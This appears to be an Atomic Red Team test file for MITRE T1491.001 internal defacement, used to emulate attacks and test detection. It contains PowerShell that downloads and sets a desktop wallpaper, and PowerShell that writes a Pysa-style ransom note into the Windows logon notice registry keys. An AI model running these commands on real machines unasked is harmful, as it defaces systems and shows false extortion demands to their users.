attack_technique: T1491.001
display_name: 'Defacement: Internal Defacement'
atomic_tests:
- name: Replace Desktop Wallpaper
  auto_generated_guid: 30558d53-9d76-41c4-9267-a7bd5184bed3
  description: |
    Downloads an image from a URL and sets it as the desktop wallpaper.
  supported_platforms:
  - windows
  input_arguments:
    url_of_wallpaper:
      description: URL pointing to the image file you wish to set as wallpaper
      type: url
      default: https://redcanary.com/wp-content/uploads/Atomic-Red-Team-Logo.png
    pointer_to_orginal_wallpaper:
      description: Full path to where a file containing the original wallpaper location will be saved
      type: string
      default: $env:TEMP\T1491.001-OrginalWallpaperLocation
    wallpaper_location:
      description: Full path to where the downloaded wallpaper image will be saved
      type: string
      default: $env:TEMP\T1491.001-newWallpaper.png
  executor:
    command: |
      $url = "#{url_of_wallpaper}"
      $imgLocation = "#{wallpaper_location}"
      $orgWallpaper = (Get-ItemProperty -Path Registry::'HKEY_CURRENT_USER\Control Panel\Desktop\' -Name WallPaper).WallPaper
      $orgWallpaper | Out-File -FilePath "#{pointer_to_orginal_wallpaper}"
      $updateWallpapercode = @' 
      using System.Runtime.InteropServices; 
      namespace Win32{

          public class Wallpaper{ 
              [DllImport("user32.dll", CharSet=CharSet.Auto)] 
               static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; 
               
               public static void SetWallpaper(string thePath){ 
                  SystemParametersInfo(20,0,thePath,3); 
              }
          }
      } 
      '@
      $wc = New-Object System.Net.WebClient  
      try{  
          $wc.DownloadFile($url, $imgLocation)
          add-type $updateWallpapercode 
          [Win32.Wallpaper]::SetWallpaper($imgLocation)
      } 
      catch [System.Net.WebException]{  
          Write-Host("Cannot download $url") 
          add-type $updateWallpapercode 
          [Win32.Wallpaper]::SetWallpaper($imgLocation)
      } 
      finally{    
          $wc.Dispose()  
      }
    cleanup_command: |
      $updateWallpapercode = @' 
      using System.Runtime.InteropServices; 
      namespace Win32{

          public class Wallpaper{ 
              [DllImport("user32.dll", CharSet=CharSet.Auto)] 
               static extern int SystemParametersInfo (int uAction , int uParam , string lpvParam , int fuWinIni) ; 
               
               public static void SetWallpaper(string thePath){ 
                  SystemParametersInfo(20,0,thePath,3); 
              }
          }
      } 
      '@
      if (Test-Path -Path #{pointer_to_orginal_wallpaper} -PathType Leaf) {
           $orgImg = Get-Content -Path "#{pointer_to_orginal_wallpaper}"
           add-type $updateWallpapercode 
           [Win32.Wallpaper]::SetWallpaper($orgImg)
      }
      Remove-Item "#{pointer_to_orginal_wallpaper}" -ErrorAction Ignore
      Remove-Item "#{wallpaper_location}" -ErrorAction Ignore
    name: powershell
- name: Configure LegalNoticeCaption and LegalNoticeText registry keys to display ransom message
  auto_generated_guid: ffcbfaab-c9ff-470b-928c-f086b326089b
  description: |
    Display ransom message to users at system start-up by configuring registry keys HKLM\SOFTWARE\Micosoft\Windows\CurrentVersion\Policies\System\LegalNoticeCaption and HKLM\SOFTWARE\Micosoft\Windows\CurrentVersion\Policies\System\LegalNoticeText.

    [SynAck Ransomware](https://www.trendmicro.com/vinfo/es/security/news/cybercrime-and-digital-threats/synack-ransomware-leverages-process-doppelg-nging-for-evasion-and-infection), 
    [Grief Ransomware](https://redcanary.com/blog/grief-ransomware/), 
    [Maze Ransomware](https://cyware.com/research-and-analysis/maze-ransomware-a-deadly-combination-of-data-theft-and-encryption-to-target-us-organizations-8f27),
    [Pysa Ransomware](https://www.cybereason.com/blog/research/threat-analysis-report-inside-the-destructive-pysa-ransomware),
    [Spook Ransomware](https://community.fortinet.com/t5/FortiEDR/Threat-Coverage-How-FortiEDR-protects-against-Spook-Ransomware/ta-p/204226),
    [DopplePaymer Ransomware](https://www.microsoft.com/en-us/wdsi/threats/malware-encyclopedia-description?Name=Ransom:Win32/Dopplepaymer&threatId=-2147221958),
    [Reedemer Ransomware](https://blog.cyble.com/2022/07/20/redeemer-ransomware-back-action/),
    [Kangaroo Ransomware](https://www.bleepingcomputer.com/news/security/the-kangaroo-ransomware-not-only-encrypts-your-data-but-tries-to-lock-you-out-of-windows/)
  supported_platforms:
  - windows
  input_arguments:
    legal_notice_caption:
      description: Title of ransom message
      type: string
      default: PYSA
    legal_notice_text:
      description: Body of ransom message
      type: string
      default: "Hi Company, every byte on any types of your devices was encrypted. Don't try to use backups because it were encrypted too. To get all your data contact us:xxxx@onionmail.org"
  executor:
    command: |-
      $orgLegalNoticeCaption = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption).LegalNoticeCaption
      $orgLegalNoticeText = (Get-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText).LegalNoticeText
      $newLegalNoticeCaption = "#{legal_notice_caption}"
      $newLegalNoticeText = "#{legal_notice_text}"
      Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption -Value $newLegalNoticeCaption -Type String -Force
      Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $newLegalNoticeText -Type String -Force      
    cleanup_command: |
      Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeCaption -Value $orgLegalNoticeCaption -Type String -Force
      Set-ItemProperty HKLM:\SOFTWARE\Microsoft\Windows\CurrentVersion\Policies\System -Name LegalNoticeText -Value $orgLegalNoticeText -Type String -Force
    name: powershell
    elevation_required: true
